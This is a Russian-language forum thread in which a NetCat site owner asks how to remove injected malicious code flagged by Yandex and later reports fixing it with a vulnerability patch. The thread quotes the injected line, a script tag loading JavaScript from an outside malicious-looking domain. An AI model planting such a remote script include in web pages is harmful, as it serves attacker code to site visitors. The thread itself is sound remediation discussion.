Вредоносный код на сайте

(Ответов: 4, Просмотров: 1530)
  1. Новичок
    • Регистрация: 04.03.2016
    • Сообщений: 28
    • Репутация: 1
    Всем доброго времени суток.
    Сайт на CMS NetCat. Яндекс нашел на сайте вредоносный код.
    Обратился за разъяснениями в Яндекс. Пришел ответ, что При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:
    Код HTML:
    <script src=http://webshop-tool-manager.info/statistic/googleapis.js></script>
    Посмотрел код страниц сайта в браузере. На всех страницах, на последней строке есть код:
    Код HTML:
    </body> </html><script src=http://webshop-tool-manager.info/statistic/googleapis.js></script>
    Не могу найти где прописан этот код, что бы его удалить.
    Искал в Макетах дизайна, в компонентах, в БД.
    Где может быть этот код прописан? Может он как то зашифрован?
    • 0
  2. Набираю обороты Аватар для Леонид Каруна
    • Регистрация: 27.08.2013
    • Сообщений: 494
    • Репутация: 82
    • Webmoney BL: ?
    maxg5,Если у вас версия от 5,0, то вы просто попали под вирусную раздачу на эти движки.
    Это вам внедрили скрипт.

    Чтобы закрыть уязвимость, выполните следующие шаги:

    Для версий 5.х
    В файле /netcat/require/s_list.inc.php в функции showSearchForm замените
    код _https://gist.github.com/NickMitin/512b3d19b3dbd89e82ac913df278472f

    на _https://gist.github.com/NickMitin/b65c523b63d712e1ac1dc3210377d2da


    Для версий 4.x и 3.х
    В файле /netcat/require/s_list.inc.php в функции showSearchForm замените
    код _https://gist.github.com/NickMitin/bd9d1d6b5fc0af0d64ce2ce129ac7973

    на _https://gist.github.com/NickMitin/1e392b9f8bee09e7d531feaeeda26677
    Предоставляю услуги по созданию сайтов.
    Не дорого и качественно.
    • 0
  3. Новичок
    • Регистрация: 04.03.2016
    • Сообщений: 28
    • Репутация: 1
    Леонид Каруна,
    У меня версия CMS NetCat 5.5.0
    Но в файле /netcat/require/s_list.inc.php в функции showSearchForm нету ничего связанного с github.com.
    Функция showSearchForm встречается в файле /netcat/require/s_list.inc.php 4 раза, но ссылок в ней ни каких нет.
    • 0
  4. Гуру Аватар для Ems
    • Регистрация: 24.05.2011
    • Сообщений: 2,032
    • Репутация: 663
    Цитата Сообщение от maxg5 Посмотреть сообщение
    нету ничего связанного с github.com.
    И не будет. Вы должны посмотреть сам код по ссылке на github.
    Облачный хостинг из TOP-3 - от 1 Gb ОЗУ, от 25 GB SSD.
    • 0
  5. Новичок
    • Регистрация: 04.03.2016
    • Сообщений: 28
    • Репутация: 1
    Проблема решена.
    Помогла эта инструкция.
    Проблема решилась удалением файла new.vars.inc.php в корне сайта и удаление внедренного скрипта в конце файла /netcat/require/s_e404.inc.php и замена кода в функции showSearchForm.
    Последний раз редактировалось maxg5; 02.05.2016 в 18:44.
    • 0

Похожие темы

Темы Раздел Ответов Последний пост
Вредоносный код на сайте
Консультации по безопасности 8 25.04.2015 13:34
Найти вредоносный код на сайте
Web программирование 10 08.09.2013 18:04
Привет от хостинга. Вредоносный код на сайте
WordPress 8 28.04.2013 15:54
Вредоносный код на сайте cms Wordpress
WordPress 9 19.03.2013 20:13
Помогите пожалуйста найти и удалить вредоносный код на сайте
Web программирование 5 30.10.2011 05:03

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры